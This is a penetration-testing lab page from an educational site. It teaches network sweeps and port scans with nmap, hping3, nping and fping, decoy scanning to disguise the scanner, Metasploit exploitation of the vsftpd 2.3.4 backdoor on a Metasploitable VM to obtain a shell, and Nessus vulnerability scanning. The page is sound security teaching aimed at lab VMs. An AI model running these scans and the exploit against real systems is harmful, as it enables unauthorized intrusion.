Samer Aoudi
EH Pentest Lab Environment Network Traffic Analysis Wi-Fi Security Malware Analysis Reconnaissance Social Engineering Network & Port Scanning Sniffing Attacks Intrusion Detection & Prevention
Courses CTF Platform Security Tools Commands Cheatsheet Awareness Blog About
Network Scanning

In this practical activity, you will utilize different tools to perform network scanning and port scanning as part of vulnerability assessment.

Why this activity? When you are performing Network Penetration Testing, your main objective is to discover active hosts on your target network, and then scan those hosts for vulnerabilities. When vulnerabilities are discovered, you can then attempt to exploit them.
Prerequisite Knowledge: Networking fundamentals
Requirements: Lab Environment Setup
Duration: 60+min
Files: None
Related Videos:
Live Host Identification  Network & Port Scanners
Task #1: Active Host Discovery
Vulnerability Assessment involves discovering weaknesses in the target system. This includes three main tasks:
  1. Network Scanning:
    2. Also called network sweeping, network tracing, or active host discovery. The main objective is to discover active hosts on a network and produce a network map.
  2. Port Scanning:
    3. For each discovered host on a network, identify open ports (i.e., running services).
  3. Vulnerability Scanning:
    4. For each running service, you can then Itry to identify whether or not vulnerabilities exist. In a Clear-Box Model, you can use automated tools (e.g., Nessus).
Network Scan Techniques
While there are many tools, the following are the tools we will be using:
  • ICMP Scan (Sweep): Send an ICMP ECHO request (ICMP type 8). If an ICMP ECHO reply (ICMP type 0) is received : target is alive. This scan is slow and easily blocked
  • TCP Scan: Send TCP ACK or TCP SYN packets. Typically targets a known port (e.g., 80) to avoid detection. RST flag is received if a host in not active; otherwise,target responds with SYN-ACK
  • UDP Scan: Relies on the ICMP PORT (i.e., destination) UNREACHABLE. When a host is active, it will respond with ICMP PORT UNREACHABLE message to say that the port is not open
Our Tools
While there are many tools, the following are the tools we will be using:
  • fping
  • nping
  • hping3
  • nmap
  • Nessus

In this activity, you will use different techniques and tools to discover active hosts on a network.

Expert Mode
  1. Use different techniques and the following tools to discover the IP addresses of your targets. Tools: fping, nping, hping3, and nmap
Regular Mode
Task in details »
  1. Start Kali and the two target VMs
  2. Get the IP address of Kali including the network address: ip a
  3. Use the manual pages, man, to learn about fping: man fping
  4. Use man to learn about nping: man nping
  5. Use man to learn about hping3: man hping3
  6. Use man to learn about nmap: man nmap
  7. Let's start with nmap. Perform a quick TCP network scan (host disocvery scan), and note down the IP addresses of your targets: nmap -sn <network address>

  8. Next is nping. Perform an ICMP probe mode network scan with nping: sudo nping --icmp <network address>
  9. Using the nping ICMP scan, how would you know that a host is active?
  10. Which one is faster? The TCP or the ICMP scan?
  11. Finally, let us perform a UDP scan using nping. nping --udp <network address>
  12. Using the nping UDP scan, how would you know that a host is active?

  13. Next, let's use fping to check if a specific host is active or not: fping 192.168.135.44
  14. Now try it against your Windows 10 target: fping <WIN10 IP>
  15. Using Wireshark, compare the results when the host is active and when it's not
  16. Try this command: fping -c 2 <WIN10 IP> <Metasploitable IP>
  17. What does the -c option do?
  18. Next, use hping3 to check if a specific host is active or not: hping3 <WIN10 IP>
  19. Using Wireshark, find out what packets hping3 sends by default
  20. Let's go back to nping and try different probe modes: nping --icmp --icmp-type 10 -c 4 <WIN10 IP>

  21. Let's go back to hping3 and try different modes (use Wireshark to find out what packets are sent in each mode):
    Raw IP Mode: hping3 -0 <Metasploitable IP>
    ICMP Mode:  hping3 -1 <Metasploitable IP>
    UDP Mode:   hping3 -2 <Metasploitable IP>
    Scan Mode:   hping3 -8 <Metasploitable IP>
    Listen Mode: hping3 -9 <Metasploitable IP>
  22. Next, try TCP scan using different flags:
    SYN: hping3 -S <Metasploitable IP>
    FIN:  hping3 -F <Metasploitable IP>
    ACK: hping3 -A <Metasploitable IP>
  23. Now, let's try using different hping3 options:
    hping3 -S -s 44567 -p 80 <Metasploitable IP>
    hping3 -8 20-25 -V <Metasploitable IP>
    hping3 -S -8 20-25 -V <Metasploitable IP>
Port Scanning is the process of scanning a host to discover open ports and running services.
In Task #1, we scanned the target network and discovered two active hosts. In this task, these two hosts are our targets.

In this activity, you will use different techniques to perform port scanning.

Expert Mode
  1. Using nmap, discover what ports are open, what services are running, and what OS are on your two targets
Regular Mode
Task in details »
  1. We will start by re-scanning the entire network, but this time without skipping port discovery. Notice that nmap will generate a report with all active hosts, their open ports, and the running service on each port:
    nmap <network address>
  2. By default, nmap scans a 1,000 known ports. However, there are 65,536 ports on any computer. Let us try a deep scan on a single target:
    nmap -p0-65535 <WIN10 IP>
  3. Repeat for Metasploitable:
    nmap -p0-65535 <Metasploitable IP>
  4. What ports were discovered in the deep scan but weren't reported in the default scan?
  5. Next, we want to enumerate the version of each running service (we will use default scan, not deep, to save time):
    nmap -sV <WIN10 IP>
  6. Repeat for Metasploitable:
    nmap -sV <Metasploitable IP>
  7. What if our targets have security controls that spoof the results. We will need to use different scan techniques to ensure we are getting more accurate results (i.e., no false negatives):
    SYN Scan: nmap -sS <Metasploitable IP>
    TCP Connect: nmap -sT <Metasploitable IP>
    Null Scan: nmap -sN <Metasploitable IP>
    FIN Scan: nmap -sF <Metasploitable IP>
    ACK Scan: nmap -sA <Metasploitable IP>
    UDP Scan: nmap -sU <Metasploitable IP>
    XMAS Scan: nmap -sX <Metasploitable IP>
  8. Next, we want to target a specific port (e.g., FTP 21). But we also want a specifc scan (e.g., TCP Connect), and want to know the service version:
    nmap -sT -sV -p 21 <WIN10 IP>
  9. Next, perform a version detection scan on one of your hosts targeting only open ports:
    nmap -sV <WIN10 IP> --open
  10. Sometimes, we just want quick results. Try the fast scan:
    nmap -F <WIN10 IP>
  11. Sometimes we want to trick the target system by providing a number of decoys. This option makes it look like those decoys are scanning the target network. It does not hide your own IP, but it makes your IP one of a torrent of others supposedly scanning the victim at the same time. We can use the decoy option -D:
    nmap -sV <WIN10 IP> -D <Metasploitable IP>
Common Vulnerabilities Exposure (CVE®) is a "list of entries—each containing an identification number, a description, and at least one public reference—for publicly known cybersecurity vulnerabilities."

In this activity, you will manually search for vulnerabilities and exploits, and perform a quick attack.

Expert Mode
  1. Using NVD and CVE Details, research potential vulnerabilities for your targets' discovered services, and exploit at least one of them
Regular Mode
Task in details »
  1. Let's start with a version scan targetting Metasploitable
    nmap -sV <Metasploitable IP>
  2. What next? We want to know if any of these services is vulnerable. Using the NVD Database » search for the vsftpd 2.3.4 service
  3. You should find a CVE Vulnerability ID CVE-2011-2523. What is the severity of this CVE?
  4. Click the CVE link to get the details. Are there any exploits for this vulnerability?
  5. The answer to the above question is YES. Namely, the VSFTPD 2.3.4 Backdoor Command Execution exploit module available on the Metasploit Framework. Let us find it. Start Metasploit
    msfconsole
  6. Type help and locate the Module Commands section
  7. Use the search command to locate the exploit we found:
    search vsftpd

    8. VSFTPD
  8. Note that the index number for our search result is 0; this can be used to save us from typing the full module name. Next, let's get some information about this module (you will need the information to answer some questions later):
    info 0
  9. Next, we want to use the module:
    use 0
    OR
    use exploit/unix/ftp/vsftpd_234_backdoor
  10. Let's see what options require our attention:
    show options
  11. RHOST is the Remote Host, or the target. Let's set it to the IP address of Metasploitable:
    set rhosts <Metasploitable IP>
  12. We are ready. Let's go ahead and run this exploit:
    run
  13. A command shell session will open upon a successful run. Basically, we hacked the target via this Backdoor. For now, we don't want to discuss the details of the attack. Let's just verify that we are indeed in the target. Type the following and notice what IP address you will get:
    ip a
  14. Let us summarize the very important steps of what we just did:
    1. We scanned a target network to discover active hosts (outcome: list of host IP addresses)
    2. We scanned a specific target host for open ports (outcome: list of open ports and running services)
    3. We got the version of a specific service
    4. We used one of the vulnerabilities databases to search for potential vulnerabilities in our service
    5. We identified an exploit module available in Metasploit Framework
    6. We used Metasploit to run the exploit and hack our target
Automated Vulnerability Scanning is typically used in clear-box pentesting. Tools like Nessus and OpenVAS allow you easily create and run scans.

Nessus is a remote security scanning tool, which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network.

In this activity, you will use a Vulnerability Scanner to discover vulnerabilities.

Expert Mode
  1. Use Nessus to scan your two targets for vulnerabilities
Regular Mode
Task in details »
  1. We will use Windows 10 for this activity, so go ahead and log in to your WIN10 VM
  2. Open Google Chrome Web browser. There shouold be a pre-configured tab with the Nessus scanner homepage
  3. You might see a privacy error/warning. Click the Advanced button and then click the Proceed to localhost (unsafe) link
  4. Log in with the following credentials: samer/password
  5. Close the welcome message dialog
  6. Click the New Scan button (top right corner) and select the Basic Network Scan option
  7. Fill in the required information as follows: Name: First Scan
    Description: CSF3203 202210
    Target: <Your Network Address IP>
  8. Click the Save button
  9. Once saved, you will be redirected to the My Scans folder with the recently created scan listed
  10. Locate the Launch button and click it to start the scan
  11. Let the scan run. While the scan is running, you can inspect the results as they are reported. Click the Running icon
  12. Click the IP address of Metasploitable to see its details
  13. Go back to the Hosts (scan results) main page and wait for the scan to be completed. When the scan is complete, explore some of the discovered vulnerabilities
  14. Click the vulnerability category: SSL (Multiple Issues)
  15. Click the first vulnerability to get its details
  16. In the Questions section, you will be asked about specific details, so make sure you know who to locate information in Nessus scan results
  17. Finally, go to the results page and export the results into a PDF
  18. Open the PDF file and view its contents. Show your instructor when done
Name
Red fields are required.
List of active hosts
List of target networks
List of open ports
List of active hosts
List of open ports and running services
List of target networks
ICMP
TCP
UDP
-0
-1
-2
-8
-9
-0
-1
-2
-8
-9
3.1
9.8
10.0

               
© Samer Aoudi 2005-2024